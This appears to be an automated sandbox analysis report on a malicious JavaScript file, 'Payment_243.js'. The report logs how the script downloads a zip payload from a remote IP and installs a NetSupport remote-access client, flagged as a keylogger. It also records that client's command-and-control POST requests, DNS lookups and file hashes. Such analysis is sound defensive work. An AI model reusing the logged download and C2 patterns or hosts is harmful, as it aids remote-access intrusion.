                                                                                      Jan 14, 2025 16:21:18.463690042 CET4916780192.168.2.22104.26.0.231
                                                                                      Jan 14, 2025 16:21:18.468815088 CET8049167104.26.0.231192.168.2.22
                                                                                      Jan 14, 2025 16:21:18.468882084 CET4916780192.168.2.22104.26.0.231
                                                                                      Jan 14, 2025 16:21:18.469197035 CET4916780192.168.2.22104.26.0.231
                                                                                      Jan 14, 2025 16:21:18.474044085 CET8049167104.26.0.231192.168.2.22
                                                                                      Jan 14, 2025 16:21:19.191450119 CET8049167104.26.0.231192.168.2.22
                                                                                      Jan 14, 2025 16:21:19.191616058 CET4916780192.168.2.22104.26.0.231
                                                                                      Jan 14, 2025 16:21:19.518095016 CET4916780192.168.2.22104.26.0.231
                                                                                      Jan 14, 2025 16:21:19.518235922 CET4916780192.168.2.22104.26.0.231
                                                                                      Jan 14, 2025 16:21:19.576423883 CET4916880192.168.2.22104.26.0.231
                                                                                      Jan 14, 2025 16:21:19.581438065 CET8049168104.26.0.231192.168.2.22
                                                                                      Jan 14, 2025 16:21:19.581598997 CET4916880192.168.2.22104.26.0.231
                                                                                      Jan 14, 2025 16:21:19.581892967 CET4916880192.168.2.22104.26.0.231
                                                                                      Jan 14, 2025 16:21:19.586620092 CET8049168104.26.0.231192.168.2.22
                                                                                      Jan 14, 2025 16:21:20.263068914 CET8049168104.26.0.231192.168.2.22
                                                                                      Jan 14, 2025 16:21:20.263333082 CET4916880192.168.2.22104.26.0.231
                                                                                      Jan 14, 2025 16:21:20.263608932 CET4916880192.168.2.22104.26.0.231
                                                                                      Jan 14, 2025 16:21:20.264259100 CET4916980192.168.2.22104.26.0.231
                                                                                      Jan 14, 2025 16:21:20.268671036 CET8049168104.26.0.231192.168.2.22
                                                                                      Jan 14, 2025 16:21:20.268745899 CET4916880192.168.2.22104.26.0.231
                                                                                      Jan 14, 2025 16:21:20.269103050 CET8049169104.26.0.231192.168.2.22
                                                                                      Jan 14, 2025 16:21:20.269160986 CET4916980192.168.2.22104.26.0.231
                                                                                      Jan 14, 2025 16:21:20.269292116 CET4916980192.168.2.22104.26.0.231
                                                                                      Jan 14, 2025 16:21:20.274040937 CET8049169104.26.0.231192.168.2.22
                                                                                      Jan 14, 2025 16:21:20.958117962 CET8049169104.26.0.231192.168.2.22
                                                                                      Jan 14, 2025 16:21:20.958182096 CET4916980192.168.2.22104.26.0.231
                                                                                      Jan 14, 2025 16:21:20.958589077 CET4916980192.168.2.22104.26.0.231
                                                                                      Jan 14, 2025 16:21:20.958600998 CET4916980192.168.2.22104.26.0.231
                                                                                      TimestampSource PortDest PortSource IPDest IP
                                                                                      Jan 14, 2025 16:21:18.298080921 CET5456253192.168.2.228.8.8.8
                                                                                      Jan 14, 2025 16:21:18.310940981 CET53545628.8.8.8192.168.2.22
                                                                                      TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                                      Jan 14, 2025 16:21:18.298080921 CET192.168.2.228.8.8.80x2022Standard query (0)geo.netsupportsoftware.comA (IP address)IN (0x0001)false
                                                                                      TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                                      Jan 14, 2025 16:21:18.310940981 CET8.8.8.8192.168.2.220x2022No error (0)geo.netsupportsoftware.com104.26.0.231A (IP address)IN (0x0001)false
                                                                                      Jan 14, 2025 16:21:18.310940981 CET8.8.8.8192.168.2.220x2022No error (0)geo.netsupportsoftware.com172.67.68.212A (IP address)IN (0x0001)false
                                                                                      Jan 14, 2025 16:21:18.310940981 CET8.8.8.8192.168.2.220x2022No error (0)geo.netsupportsoftware.com104.26.1.231A (IP address)IN (0x0001)false
                                                                                      • 45.155.249.215
                                                                                      • 185.157.213.71connection: keep-alivecmd=pollinfo=1ack=1
                                                                                      • geo.netsupportsoftware.com
                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                      0192.168.2.224916545.155.249.215803364C:\Windows\System32\wscript.exe
                                                                                      TimestampBytes transferredDirectionData
                                                                                      Jan 14, 2025 16:21:08.003062010 CET336OUTGET /xxx.zip?mt=6364 HTTP/1.1
                                                                                      Accept: */*
                                                                                      UA-CPU: AMD64
                                                                                      Accept-Encoding: gzip, deflate
                                                                                      User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
                                                                                      Host: 45.155.249.215
                                                                                      Connection: Keep-Alive
                                                                                      Jan 14, 2025 16:21:08.602437019 CET1236INHTTP/1.1 200 OK
                                                                                      Server: nginx/1.24.0 (Ubuntu)
                                                                                      Date: Tue, 14 Jan 2025 15:21:08 GMT
                                                                                      Content-Type: application/zip
                                                                                      Content-Length: 2845498
                                                                                      Connection: keep-alive
                                                                                      Last-Modified: Mon, 13 Jan 2025 16:08:22 GMT
                                                                                      ETag: "2b6b3a-62b98a754cee9"
                                                                                      Accept-Ranges: bytes
                                                                                      Data Raw: 50 4b 03 04 0a 00 00 00 00 00 44 77 2a 5a 00 00 00 00 00 00 00 00 00 00 00 00 08 00 00 00 69 6e 73 74 61 6c 6c 2f 50 4b 03 04 14 00 00 00 08 00 0b 50 29 5a 14 81 51 7e 86 b5 00 00 7c b5 00 00 19 00 00 00 69 6e 73 74 61 6c 6c 2f 35 42 38 46 45 42 32 41 46 38 31 37 34 39 33 45 73 00 05 80 fa 7f 54 44 46 24 51 72 4c 00 00 00 b5 60 88 47 af 1c 6c 35 ca ca 04 4a ee 30 0b ac fc 54 a5 52 80 93 43 4f 67 b0 e8 c6 b3 c1 a1 91 b9 e6 b0 db 7f 3a ed 1f 97 37 3c 2d 12 23 9a 03 a0 82 51 20 90 c6 b0 1d 28 dc 14 8f fa 4d 65 17 fa 2e bd 9a 1b 49 df 54 25 51 81 a0 e5 e3 c9 7d 48 92 3b c0 c1 12 bd 33 4b df 7f 70 4d ec ab 00 6a 2b 1d 0d 4a 4a ac bb 29 9d 51 7e dd e3 78 3f d4 f6 44 c4 65 d3 f9 26 7e c5 a4 cb 66 92 18 15 e3 07 28 f4 6e 21 9f 76 0e 33 83 6f 05 6a f0 f7 f1 25 7b f8 13 9d e3 c3 62 a1 d8 a2 d1 3e 0c 9d 79 11 10 09 de 7a c7 88 00 c4 9b a4 91 db a9 9b 0e 8a 99 90 7a 0d 00 de ac 45 3e 0d 8d a6 e7 f8 f0 48 4a 44 ff 41 c2 5d d2 ff 79 dc 7b 7e 86 77 78 a6 08 5e 55 f9 3c b4 77 ca 4c 83 b5 7e aa c9 6a 16 d5 5b a8 68 [TRUNCATED]
                                                                                      Data Ascii: PKDw*Zinstall/PKP)ZQ~|install/5B8FEB2AF817493EsTDF$QrL`Gl5J0TRCOg:7<-#Q (Me.IT%Q}H;3KpMj+JJ)Q~x?De&~f(n!v3oj%{b>yzzE>HJDA]y{~wx^U<wL~j[h<:,bybY`Y0FY\FJc{ne!89Za*si]NMDy;RD[m#?\ dwTP`GVqPdg 8[2^~4#^kS5{{)W2&PG1L^Y'Qt/~#~z9:;tIbgd T#?A~f%UB/g?7d$){B#E4N:mM]LDwCA7z)Rqi-j~3Ee+q2}'{"'W{]|gKyA;x2YxiPJI];TK%bz+aQ$rMNL@S4;anOm=oCm,`oQ(&pTYp<a#xhQCN"iufA#CS43NtHcg|t&8uxLY$)Z4AtW*Z*z7'2m
                                                                                      Jan 14, 2025 16:21:08.602452993 CET224INData Raw: b9 5a 4f 19 ce 09 29 bd f0 77 20 af cf 3a 9f 4c 90 67 70 13 f1 c0 89 e7 79 13 95 fa 36 9a d9 fa 85 f7 69 80 d9 41 53 09 95 0e 02 2d e1 56 10 37 7b 0c 4f cc 80 b8 43 85 1d 98 f7 01 20 b3 0c ba 3f 56 24 09 1f 4e 50 b0 ae eb ce fe 86 d9 09 27 f5 df
                                                                                      Data Ascii: ZO)w :Lgpy6iAS-V7{OC ?V$NP'v){pkTVUQ?'aheZYyFq/O\.;'S:<E&U]jd%*$!LJ(:FX'X\"Ux\pqmYvouDO@)O
                                                                                      Jan 14, 2025 16:21:08.602464914 CET1236INData Raw: 59 b4 49 2f b4 63 1a 8f 43 fa 1e 1f 94 19 88 7c 3f e3 12 18 65 9e b5 b4 83 94 2a 54 b8 3e b6 88 4c 43 cf 1a 91 42 1a 13 92 f6 67 22 aa 4a 12 c8 7d ff dd 95 ed 74 6b f3 0b dc 6a 26 83 97 da dc 6c 14 7f 8e a4 50 55 f9 6d 69 29 95 46 e2 a3 20 45 be
                                                                                      Data Ascii: YI/cC|?e*T>LCBg"J}tkj&lPUmi)F EH^Nf-("&10PwIIe"#82+Ty}0S"{HcRm=Ges% INQuF%mT.wg-v.{}2vlx6DfW`t
                                                                                      Jan 14, 2025 16:21:08.602525949 CET224INData Raw: 77 e9 76 22 f6 4a 08 2b a8 4b a6 8c 34 17 5d a2 f3 9d 06 7a c9 2c 89 af b7 72 83 d0 a5 0d 81 9f c7 fc 19 66 b4 22 fa 42 66 4d 30 f4 1c fd 7f 82 92 dd ac 8b 50 ce 39 59 d3 f5 d8 b1 d7 2a 3b eb ab 35 39 b7 ac a3 ec dd 72 7b d4 88 de b7 7b 64 8a 97
                                                                                      Data Ascii: wv"J+K4]z,rf"BfM0P9Y*;59r{{duZtR.:a5I.;=ZMB-brR~{Gf5m4GrKzWeK>*klYmC7qWqrQJDd|(
                                                                                      Jan 14, 2025 16:21:08.602538109 CET1236INData Raw: 35 b2 9c 25 28 e5 f7 75 50 26 c1 af 71 24 5e 7c 0b fe b3 e3 f9 d8 f8 e8 84 1e fc 04 52 33 9d ce 3a 95 35 e7 44 b8 1f cb b5 67 c9 03 bc a8 14 c5 86 b2 24 f9 5a 70 79 b0 f2 27 88 49 2f 21 64 49 85 24 25 7e 27 4a b8 ac c9 f6 0a 61 78 ed 37 e9 fd 2f
                                                                                      Data Ascii: 5%(uP&q$^|R3:5Dg$Zpy'I/!dI$%~'Jax7/wuzc;7vmg^:'k>T\p8tWe"9wI^G(\!0UdDq|HS?|pIqGo0X^^^CFGob9QQ/$4nrR
                                                                                      Jan 14, 2025 16:21:08.602574110 CET224INData Raw: 2d f5 5b 74 65 18 52 01 47 bc a4 7b 12 6c f5 e4 2d 0d 75 e8 82 ae 21 99 e0 b3 6b 7d 85 39 48 7d 40 b1 1a 20 95 be fc 37 dd e4 1f 44 f0 b2 00 8c 72 59 4a f7 7a 89 cb 70 54 2c 26 23 17 24 15 13 9e e5 56 e9 e4 b6 df d5 5c 2d 4a 95 86 b0 ed 86 49 f8
                                                                                      Data Ascii: -[teRG{l-u!k}9H}@ 7DrYJzpT,&#$V\-JIMtDY4FR_~.gZMF1&70aTjFz#tY{?q,_(n);%JP5z#&vMf5c i%pm
                                                                                      Jan 14, 2025 16:21:08.602585077 CET1236INData Raw: 3b c4 ca a2 92 df 50 8e bb 6a 15 55 2d c0 f1 b8 08 3e d8 f0 5e 2b 67 a2 02 22 69 37 c0 6b a0 d7 ad d1 30 88 20 22 56 8e f3 54 29 ce 2e 6a b2 3a 9c 48 69 7c 18 a0 3b a5 76 3c d5 d4 c8 e3 88 e7 2d 71 7f c7 09 8f 90 21 a7 a0 08 ae c9 70 8f dc d3 dc
                                                                                      Data Ascii: ;PjU->^+g"i7k0 "VT).j:Hi|;v<-q!p$I{'rH']lb}D7FmSr(u&SD?OtYAu5/dKHL3bqN9,h5\orx'+(zDqi6>-aO`Hg
                                                                                      Jan 14, 2025 16:21:08.602596045 CET224INData Raw: 31 74 e1 73 b4 c3 f1 57 31 08 45 79 fc 86 1f 29 91 08 e9 c7 a0 ae aa bb 9f bb 10 2a 2f 69 2b 72 bc d7 77 29 77 ee f0 98 44 e8 d6 c5 86 87 8d e9 cd 6e 6a 2a 77 64 8a 9d c0 60 1a ed ab 36 9e b9 9f 3b d5 4f 74 14 45 f1 ac 3c 04 82 06 4a a8 00 6c 09
                                                                                      Data Ascii: 1tsW1Ey)*/i+rw)wDnj*wd`6;OtE<Jl+sR&MxOavSGK##K>l*D]!X@y`3K];[.0r4p#K35eu6Ml0UZzPDL?@od
                                                                                      Jan 14, 2025 16:21:08.602715015 CET1236INData Raw: 4d a1 75 dd 48 26 01 d8 4b 76 f3 63 b3 79 c2 92 71 0b 35 46 d3 d4 c1 51 98 3f a5 bd fa 9e 45 7e b6 45 72 06 12 58 4a 7d 15 22 18 fc 3f d8 05 02 e9 26 3d a3 f5 da 35 f0 a7 7a 07 60 e9 0d 0e e4 d6 ad 0a c1 9d d2 d8 31 52 6b 39 a9 10 6a dd cb f7 f1
                                                                                      Data Ascii: MuH&Kvcyq5FQ?E~ErXJ}"?&=5z`1Rk9jf9E93p;odzX\ .cxFqw94q%0393>fe4'+}HXNPo?a0<E2lTh?:m^xeB&V1AS%.-.
                                                                                      Jan 14, 2025 16:21:08.602725029 CET224INData Raw: 82 43 ab 0f fa 38 f1 f5 be 7c 0f 71 10 55 10 3f 6a 1f 2c 3a 39 c4 a1 80 1f b9 ec 17 c8 1d 4d 3e ed 0e fa bb 35 cf 41 f4 06 6c 42 42 ff 05 5b e5 6d 05 e7 fa 2b 24 42 8f 36 61 53 c7 54 ae 44 86 06 bb 44 56 3b f4 17 8b af 2d be 49 88 35 c4 3c 45 de
                                                                                      Data Ascii: C8|qU?j,:9M>5AlBB[m+$B6aSTDDV;-I5<EA#2|*O2>Q1r$t4vI6?o*@e3F;z `e4j=,?Z=j,Tpf@TU'>h
                                                                                      Jan 14, 2025 16:21:08.607434988 CET1236INData Raw: fc 5a ce 9e 41 83 92 8c 78 23 d9 cd 83 9c ab 63 2d 87 5d 71 e2 a9 ed 9b bf 19 5b 06 0b 7f 4f 85 ff 1d fa 3b 94 62 77 dc 0f b2 25 d9 00 be 74 41 5b d7 3c d0 5d aa 9c 88 7a 78 86 e0 24 e7 f2 b2 97 96 0e 02 d4 60 99 b4 8f ad dc de 39 c6 f4 1c e9 23
                                                                                      Data Ascii: ZAx#c-]q[O;bw%tA[<]zx$`9#Yf1[i#r9HZk;g~ng+M^w3CZ`n3,=Lgr+wH#IPmpd%B|G-0:a9x~ig\{PrN


                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                      1192.168.2.2249166185.157.213.714433748C:\ProgramData\x225qa0\client32.exe
                                                                                      TimestampBytes transferredDirectionData
                                                                                      Jan 14, 2025 16:21:17.443648100 CET220OUTPOST http://185.157.213.71/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 22Host: 185.157.213.71Connection: Keep-AliveCMD=POLLINFO=1ACK=1
                                                                                      Data Raw:
                                                                                      Data Ascii:


                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                      2192.168.2.2249167104.26.0.231803748C:\ProgramData\x225qa0\client32.exe
                                                                                      TimestampBytes transferredDirectionData
                                                                                      Jan 14, 2025 16:21:18.469197035 CET118OUTGET /location/loca.asp HTTP/1.1
                                                                                      Host: geo.netsupportsoftware.com
                                                                                      Connection: Keep-Alive
                                                                                      Cache-Control: no-cache
                                                                                      Jan 14, 2025 16:21:19.191450119 CET1123INHTTP/1.1 404 Not Found
                                                                                      Date: Tue, 14 Jan 2025 15:21:19 GMT
                                                                                      Content-Type: text/html; charset=us-ascii
                                                                                      Transfer-Encoding: chunked
                                                                                      Connection: keep-alive
                                                                                      CF-Ray: 901e9d7529d1c988-IAD
                                                                                      CF-Cache-Status: DYNAMIC
                                                                                      cf-apo-via: origin,host
                                                                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Gc3oIBvBtUgM8YAwbRN48w5AsnTbnCGPG4HIQT2ZB6J88m7vBx2lZz2S2l%2BsemwJa2rW0KJwidk18w5jAANvtDPuVpiETPEm4TD0tqhBVYG%2BwMN9jSkP85%2BAMInOnFYS7d7Zi5r4PtBHFeCd"}],"group":"cf-nel","max_age":604800}
                                                                                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                      Server: cloudflare
                                                                                      server-timing: cfL4;desc="?proto=TCP&rtt=8080&min_rtt=8080&rtt_var=4040&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=118&delivery_rate=0&cwnd=30&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                      Data Raw: 31 33 62 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 48 54 4d 4c 20 34 2e 30 31 2f 2f 45 4e 22 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 68 74 6d 6c 34 2f 73 74 72 69 63 74 2e 64 74 64 22 3e 0d 0a 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 3c 54 49 54 4c 45 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 54 49 54 4c 45 3e 0d 0a 3c 4d 45 54 41 20 48 54 54 50 2d 45 51 55 49 56 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 43 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 73 2d 61 73 63 69 69 22 3e 3c 2f 48 45 41 44 3e 0d 0a 3c 42 4f 44 59 3e 3c 68 32 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 32 3e 0d 0a 3c 68 72 3e 3c 70 3e 48 54 54 50 20 45 72 72 6f 72 20 34 30 34 2e 20 54 68 65 20 72 65 71 75 65 73 74 65 64 20 72 65 73 6f 75 72 63 65 20 69 73 20 6e 6f 74 20 66 6f 75 6e 64 2e 3c 2f 70 3e 0d 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0d 0a 0d 0a 30 0d 0a 0d 0a
                                                                                      Data Ascii: 13b<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN""http://www.w3.org/TR/html4/strict.dtd"><HTML><HEAD><TITLE>Not Found</TITLE><META HTTP-EQUIV="Content-Type" Content="text/html; charset=us-ascii"></HEAD><BODY><h2>Not Found</h2><hr><p>HTTP Error 404. The requested resource is not found.</p></BODY></HTML>0


                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                      3192.168.2.2249168104.26.0.231803748C:\ProgramData\x225qa0\client32.exe
                                                                                      TimestampBytes transferredDirectionData
                                                                                      Jan 14, 2025 16:21:19.581892967 CET118OUTGET /location/loca.asp HTTP/1.1
                                                                                      Host: geo.netsupportsoftware.com
                                                                                      Connection: Keep-Alive
                                                                                      Cache-Control: no-cache
                                                                                      Jan 14, 2025 16:21:20.263068914 CET802INHTTP/1.1 404 Not Found
                                                                                      Date: Tue, 14 Jan 2025 15:21:20 GMT
                                                                                      Content-Type: text/html; charset=us-ascii
                                                                                      Transfer-Encoding: chunked
                                                                                      Connection: keep-alive
                                                                                      CF-Ray: 901e9d7bedff0f37-EWR
                                                                                      CF-Cache-Status: DYNAMIC
                                                                                      cf-apo-via: origin,host
                                                                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Kv9TaLead1UM8xuCNbW5bbNocBjfRxR77Xi1neXV%2FjpNe6%2FpYbFfDPPkOJzct6zd%2FEhAt%2Fm%2FoRe3OIbFNrrYb9Dv7JMdUVy9Sq4tNVR2%2FGE8XIqWXIX7fXyei70qyxJmBXBhkM1TPoBC5NpR"}],"group":"cf-nel","max_age":604800}
                                                                                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                      Server: cloudflare
                                                                                      server-timing: cfL4;desc="?proto=TCP&rtt=1482&min_rtt=1482&rtt_var=741&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=118&delivery_rate=0&cwnd=137&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"


                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                      4192.168.2.2249169104.26.0.231803748C:\ProgramData\x225qa0\client32.exe
                                                                                      TimestampBytes transferredDirectionData
                                                                                      Jan 14, 2025 16:21:20.269292116 CET118OUTGET /location/loca.asp HTTP/1.1
                                                                                      Host: geo.netsupportsoftware.com
                                                                                      Connection: Keep-Alive
                                                                                      Cache-Control: no-cache
                                                                                      Jan 14, 2025 16:21:20.958117962 CET1129INHTTP/1.1 404 Not Found
                                                                                      Date: Tue, 14 Jan 2025 15:21:20 GMT
                                                                                      Content-Type: text/html; charset=us-ascii
                                                                                      Transfer-Encoding: chunked
                                                                                      Connection: keep-alive
                                                                                      CF-Ray: 901e9d804f440c92-EWR
                                                                                      CF-Cache-Status: DYNAMIC
                                                                                      cf-apo-via: origin,host
                                                                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=3SEZmome8uga32gP%2FZMtXcxpGi%2BtdRASRvM4EkIhhWM%2FwtTuCdV3BPbNrHTGnDFM26lQ2%2FNTNhwt56JEbpbT4xQGDGmlikULEjJMaPDiEbmpk6NnNSw%2FKJWQdpQXzWszGDHhAZs6fqvrFOK%2B"}],"group":"cf-nel","max_age":604800}
                                                                                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                      Server: cloudflare
                                                                                      server-timing: cfL4;desc="?proto=TCP&rtt=1528&min_rtt=1528&rtt_var=764&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=118&delivery_rate=0&cwnd=172&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                      Data Raw: 31 33 62 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 48 54 4d 4c 20 34 2e 30 31 2f 2f 45 4e 22 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 68 74 6d 6c 34 2f 73 74 72 69 63 74 2e 64 74 64 22 3e 0d 0a 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 3c 54 49 54 4c 45 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 54 49 54 4c 45 3e 0d 0a 3c 4d 45 54 41 20 48 54 54 50 2d 45 51 55 49 56 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 43 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 73 2d 61 73 63 69 69 22 3e 3c 2f 48 45 41 44 3e 0d 0a 3c 42 4f 44 59 3e 3c 68 32 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 32 3e 0d 0a 3c 68 72 3e 3c 70 3e 48 54 54 50 20 45 72 72 6f 72 20 34 30 34 2e 20 54 68 65 20 72 65 71 75 65 73 74 65 64 20 72 65 73 6f 75 72 63 65 20 69 73 20 6e 6f 74 20 66 6f 75 6e 64 2e 3c 2f 70 3e 0d 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0d 0a 0d 0a 30 0d 0a 0d 0a
                                                                                      Data Ascii: 13b<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN""http://www.w3.org/TR/html4/strict.dtd"><HTML><HEAD><TITLE>Not Found</TITLE><META HTTP-EQUIV="Content-Type" Content="text/html; charset=us-ascii"></HEAD><BODY><h2>Not Found</h2><hr><p>HTTP Error 404. The requested resource is not found.</p></BODY></HTML>0


                                                                                      Click to jump to process

                                                                                      Click to jump to process

                                                                                      Click to dive into process behavior distribution

                                                                                      Click to jump to process

                                                                                      Target ID:0
                                                                                      Start time:10:20:16
                                                                                      Start date:14/01/2025
                                                                                      Path:C:\Windows\System32\wscript.exe
                                                                                      Wow64 process (32bit):false
                                                                                      Commandline:C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\Payment_243.js"
                                                                                      Imagebase:0xff4e0000
                                                                                      File size:168'960 bytes
                                                                                      MD5 hash:045451FA238A75305CC26AC982472367
                                                                                      Has elevated privileges:true
                                                                                      Has administrator privileges:true
                                                                                      Programmed in:C, C++ or other language
                                                                                      Reputation:high
                                                                                      Has exited:true

                                                                                      Target ID:4
                                                                                      Start time:10:21:14
                                                                                      Start date:14/01/2025
                                                                                      Path:C:\ProgramData\x225qa0\client32.exe
                                                                                      Wow64 process (32bit):true
                                                                                      Commandline:"C:\ProgramData\x225qa0\client32.exe"
                                                                                      Imagebase:0xaa0000
                                                                                      File size:103'824 bytes
                                                                                      MD5 hash:C4F1B50E3111D29774F7525039FF7086
                                                                                      Has elevated privileges:true
                                                                                      Has administrator privileges:true
                                                                                      Programmed in:C, C++ or other language
                                                                                      Yara matches:
                                                                                      • Rule: JoeSecurity_NetSupport, Description: Yara detected NetSupport remote tool, Source: 00000004.00000002.670970970.00000000111E2000.00000004.00000001.01000000.00000009.sdmp, Author: Joe Security
                                                                                      • Rule: JoeSecurity_NetSupport, Description: Yara detected NetSupport remote tool, Source: 00000004.00000002.670588209.0000000000AA2000.00000002.00000001.01000000.00000008.sdmp, Author: Joe Security
                                                                                      • Rule: JoeSecurity_NetSupport, Description: Yara detected NetSupport remote tool, Source: 00000004.00000000.516821762.0000000000AA2000.00000002.00000001.01000000.00000008.sdmp, Author: Joe Security
                                                                                      • Rule: JoeSecurity_Keylogger_Generic, Description: Yara detected Keylogger Generic, Source: 00000004.00000002.670958515.0000000011194000.00000002.00000001.01000000.00000009.sdmp, Author: Joe Security
                                                                                      • Rule: JoeSecurity_NetSupport, Description: Yara detected NetSupport remote tool, Source: 00000004.00000002.670958515.0000000011194000.00000002.00000001.01000000.00000009.sdmp, Author: Joe Security
                                                                                      • Rule: JoeSecurity_NetSupport, Description: Yara detected NetSupport remote tool, Source: 00000004.00000002.670615184.000000000201E000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                      • Rule: JoeSecurity_NetSupport, Description: Yara detected NetSupport remote tool, Source: 00000004.00000002.671102639.0000000071610000.00000002.00000001.01000000.0000000D.sdmp, Author: Joe Security
                                                                                      • Rule: JoeSecurity_NetSupport, Description: Yara detected NetSupport remote tool, Source: C:\ProgramData\x225qa0\client32.exe, Author: Joe Security
                                                                                      Antivirus matches:
                                                                                      • Detection: 32%, ReversingLabs
                                                                                      Reputation:moderate
                                                                                      Has exited:false

                                                                                      Target ID:6
                                                                                      Start time:10:21:20
                                                                                      Start date:14/01/2025
                                                                                      Path:C:\ProgramData\x225qa0\client32.exe
                                                                                      Wow64 process (32bit):true
                                                                                      Commandline:"C:\ProgramData\x225qa0\client32.exe"
                                                                                      Imagebase:0xaa0000
                                                                                      File size:103'824 bytes
                                                                                      MD5 hash:C4F1B50E3111D29774F7525039FF7086
                                                                                      Has elevated privileges:true
                                                                                      Has administrator privileges:true
                                                                                      Programmed in:C, C++ or other language
                                                                                      Yara matches:
                                                                                      • Rule: JoeSecurity_NetSupport, Description: Yara detected NetSupport remote tool, Source: 00000006.00000000.529790878.0000000000AA2000.00000002.00000001.01000000.00000008.sdmp, Author: Joe Security
                                                                                      • Rule: JoeSecurity_NetSupport, Description: Yara detected NetSupport remote tool, Source: 00000006.00000002.530116570.00000000111E2000.00000004.00000001.01000000.00000009.sdmp, Author: Joe Security
                                                                                      • Rule: JoeSecurity_NetSupport, Description: Yara detected NetSupport remote tool, Source: 00000006.00000002.530048197.0000000000AA2000.00000002.00000001.01000000.00000008.sdmp, Author: Joe Security
                                                                                      • Rule: JoeSecurity_Keylogger_Generic, Description: Yara detected Keylogger Generic, Source: 00000006.00000002.530108204.0000000011194000.00000002.00000001.01000000.00000009.sdmp, Author: Joe Security
                                                                                      • Rule: JoeSecurity_NetSupport, Description: Yara detected NetSupport remote tool, Source: 00000006.00000002.530108204.0000000011194000.00000002.00000001.01000000.00000009.sdmp, Author: Joe Security
                                                                                      Reputation:moderate
                                                                                      Has exited:true

                                                                                      Target ID:8
                                                                                      Start time:10:21:28
                                                                                      Start date:14/01/2025
                                                                                      Path:C:\ProgramData\x225qa0\client32.exe
                                                                                      Wow64 process (32bit):true
                                                                                      Commandline:"C:\ProgramData\x225qa0\client32.exe"
                                                                                      Imagebase:0xaa0000
                                                                                      File size:103'824 bytes
                                                                                      MD5 hash:C4F1B50E3111D29774F7525039FF7086
                                                                                      Has elevated privileges:true
                                                                                      Has administrator privileges:true
                                                                                      Programmed in:C, C++ or other language
                                                                                      Yara matches:
                                                                                      • Rule: JoeSecurity_NetSupport, Description: Yara detected NetSupport remote tool, Source: 00000008.00000002.547582545.0000000000AA2000.00000002.00000001.01000000.00000008.sdmp, Author: Joe Security
                                                                                      • Rule: JoeSecurity_NetSupport, Description: Yara detected NetSupport remote tool, Source: 00000008.00000000.547201521.0000000000AA2000.00000002.00000001.01000000.00000008.sdmp, Author: Joe Security
                                                                                      • Rule: JoeSecurity_Keylogger_Generic, Description: Yara detected Keylogger Generic, Source: 00000008.00000002.547693910.0000000011194000.00000002.00000001.01000000.00000009.sdmp, Author: Joe Security
                                                                                      • Rule: JoeSecurity_NetSupport, Description: Yara detected NetSupport remote tool, Source: 00000008.00000002.547693910.0000000011194000.00000002.00000001.01000000.00000009.sdmp, Author: Joe Security
                                                                                      • Rule: JoeSecurity_NetSupport, Description: Yara detected NetSupport remote tool, Source: 00000008.00000002.547708086.00000000111E2000.00000004.00000001.01000000.00000009.sdmp, Author: Joe Security
                                                                                      Reputation:moderate
                                                                                      Has exited:true

                                                                                      Reset < >

                                                                                        Execution Graph

                                                                                        Execution Coverage:6.3%
                                                                                        Dynamic/Decrypted Code Coverage:0%
